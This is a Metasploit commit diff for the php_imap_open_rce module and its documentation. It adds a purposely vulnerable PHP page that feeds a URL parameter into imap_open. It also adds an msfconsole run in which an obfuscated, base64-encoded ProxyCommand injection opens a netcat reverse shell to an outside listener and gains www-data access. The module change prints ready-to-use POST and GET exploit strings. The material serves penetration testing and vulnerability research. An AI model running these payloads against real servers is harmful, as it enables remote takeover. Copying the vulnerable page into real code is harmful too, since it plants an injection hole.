cleaned up code, added custom

documentation/modules/exploit/linux/http/php_imap_open_rce.md

@@ -7,12 +7,9 @@
   While many custom applications may use `imap_open`, it is reported that the following
   applications are vulnerable: 
 
-* instantcms
-* [HostCMS](https://github.com/HostCMS/hostcms6.free/blob/1d54bdefcd6c28918cb09dd7cb6aea404879b93f/modules/core/mail/imap.php#L140)
-* [e107 v2](https://github.com/e107inc/e107/blob/7570b7ce4e17c03e9759c90889db8e750d566e53/e107_handlers/pop_bounce_handler.php#L83)
 * [prestashop](https://github.com/PrestaShop/PrestaShop/blob/0d53d6b58b951ac364ad44671cf1ae9bf7ab6aed/controllers/admin/AdminCustomerThreadsController.php#L1010)
 * [SuiteCRM](https://github.com/salesagility/SuiteCRM/blob/153b2bae76097cdba9fc9c025bcd829a702b8687/modules/InboundEmail/EditView.php#L260)
-* SugarCRM
+* [e107 v2](https://github.com/e107inc/e107/blob/7570b7ce4e17c03e9759c90889db8e750d566e53/e107_handlers/pop_bounce_handler.php#L83)
 
   Prestashop exploitation requires the admin URI, and administrator credentials.
 
@@ -20,6 +17,8 @@
 
   e107 v2 exploitation requires administrator credentials.
 
+  Additional applications were reported vulnerable, but exploits were not written. See [#10987](https://github.com/rapid7/metasploit-framework/pull/10987) for additional details.
+
 ### Prestashop 1.7.2.4 on Ubuntu 16.04
 
 Mostly derived from [websiteforstudents.com](https://websiteforstudents.com/install-prestashop-on-ubuntu-17-04-17-10-with-apache2-mariadb-and-php/),
@@ -212,6 +211,39 @@ sudo systemctl restart mysql.server
 sudo systemctl restart mysql.service
 ```
 
+### Custom Page on Ubuntu 16.04
+
+Make sure `php-imap` is installed and enabled.  Create `imap.php` with the following content.
+
+```
+<html>
+  <body>
+    <p>imap_open example exploitation page.  Use URL parameter 'server'.  Ex http://1.1.1.1/imap.php?server=EXPLOITHERE</p>
+<?php
+  $server = htmlspecialchars($_GET["server"]);
+  $mbox = @imap_open("{".$server.":143}INBOX",'username','password');
+  echo '<p>Received: '.$server.'</p>';
+
+  $errors = imap_errors();
+  if (is_array($errors)) {
+    $errors = array_unique($errors);
+  }
+  if (count($errors) && is_array($errors)) {
+    $str_errors = '';
+    foreach ($errors as $error) {
+      $str_errors .= $error . ', ';
+    }
+    $str_errors = rtrim(trim($str_errors), ',');
+  }
+  if (!$mbox) {
+    echo '<p>Errors: ' . ($str_errors);
+  }
+?>
+
+  </body>
+</html>
+```
+
 ## Verification Steps
 
   1. Install a vulnerable application
@@ -338,3 +370,31 @@ sudo systemctl restart mysql.service
   id
   uid=33(www-data) gid=33(www-data) groups=33(www-data)
   ```
+
+### Custom Page on Ubuntu 16.04
+
+Using the `imap.php` page listed above.
+
+  ```
+  msf5 > use exploit/linux/http/php_imap_open_rce 
+  msf5 exploit(linux/http/php_imap_open_rce) > set target 3
+  target => 3
+  msf5 exploit(linux/http/php_imap_open_rce) > set lhost 1.1.1.1
+  lhost => 1.1.1.1
+  msf5 exploit(linux/http/php_imap_open_rce) > set rhost 2.2.2.2
+  rhost => 2.2.2.2
+  msf5 exploit(linux/http/php_imap_open_rce) > exploit
+  
+  [*] Started reverse TCP handler on 1.1.1.1:4444 
+  [*] Listener started for 300 seconds
+  [+] POST request connection string: x -oProxyCommand=`echo$IFS$()bWtmaWZvIC90bXAvaWVib3U7IG5jIDE5Mi4xNjguMi4xMTcgNDQ0NCAwPC90bXAvaWVib3UgfCAvYmluL3NoID4vdG1wL2llYm91IDI+JjE7IHJtIC90bXAvaWVib3U=|base64$IFS$()-d|bash`}
+  [+] GET request connection string: x%20-oProxyCommand=%60echo$IFS$()bWtmaWZvIC90bXAvaWVib3U7IG5jIDE5Mi4xNjguMi4xMTcgNDQ0NCAwPC90bXAvaWVib3UgfCAvYmluL3NoID4vdG1wL2llYm91IDI%2BJjE7IHJtIC90bXAvaWVib3U=%7Cbase64$IFS$()-d%7Cbash%60%7D
+  [*] Command shell session 1 opened (1.1.1.1:4444 -> 2.2.2.2:41124) at 2018-11-25 10:52:55 -0500
+  
+  uname -a
+  Linux ubuntu1604 4.4.0-134-generic #160-Ubuntu SMP Wed Aug 15 14:58:00 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
+  id
+  uid=33(www-data) gid=33(www-data) groups=33(www-data)
+  ```
+
+The GET request was utilized, and the final URL utilized was: `http://2.2.2.2/imap.php?server=x%20-oProxyCommand=%60echo$IFS$()bWtmaWZvIC90bXAvaWVib3U7IG5jIDE5Mi4xNjguMi4xMTcgNDQ0NCAwPC90bXAvaWVib3UgfCAvYmluL3NoID4vdG1wL2llYm91IDI%2BJjE7IHJtIC90bXAvaWVib3U=%7Cbase64$IFS$()-d%7Cbash%60%7D`

modules/exploits/linux/http/php_imap_open_rce.rb

@@ -15,8 +15,8 @@ class MetasploitModule < Msf::Exploit::Remote
         The imap_open function within php, if called without the /norsh flag, will attempt to preauthenticate an
         IMAP session.  On Debian based systems, including Ubuntu, rsh is mapped to the ssh binary.  Ssh's ProxyCommand
         option can be passed from imap_open to execute arbitrary commands.
-        While many custom applications may use imap_open, it is reported that the following applications are vulnerable:
+        While many custom applications may use imap_open, this exploit works against the following applications:
-        instantcms, HostCMS, e107 v2, prestashop, SuiteCRM, SugarCRM.
+        e107 v2, prestashop, SuiteCRM, as well as Custom, which simply prints the exploit strings for use.
         Prestashop exploitation requires the admin URI, and administrator credentials.
         suiteCRM/e107/hostcms require administrator credentials.
       },
@@ -457,7 +457,9 @@ class MetasploitModule < Msf::Exploit::Remote
       print_status('IMAP server config left on server, manual removal required.')
     elsif target.name =~ /custom/
       print_status('Listener started for 300 seconds')
-      print_good("Use the following connection string: x #{command}}")
+      print_good("POST request connection string: x #{command}}")
+      # URI.encode leaves + as + since that's a space encoded.  So we manually change it.
+      print_good("GET request connection string: #{URI.encode("x " + command + "}").sub! '+', '%2B'}")
     end
   end
 end